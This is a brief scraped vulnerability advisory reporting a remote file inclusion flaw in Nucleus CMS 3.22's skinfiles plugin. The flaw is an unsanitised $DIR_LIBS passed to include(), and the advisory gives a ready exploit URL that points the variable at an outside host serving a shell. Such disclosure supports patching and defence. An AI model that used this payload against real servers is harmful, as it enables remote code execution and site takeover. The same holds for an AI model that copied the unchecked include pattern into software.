Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16866
HistoryApr 28, 2007 - 12:00 a.m.

nucleus 3.22 >> RFI

2007-04-2800:00:00
vulners.com
15

VENDOR :http://nucleuscms.org/
BY : s3rv3r_hack3r (hackerz.ir admin)
bug:
nucleus3.22/nucleus/plugins/skinfiles/index.php = include($DIR_LIBS . 'PLUGINADMIN.php');
Exloit:
http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell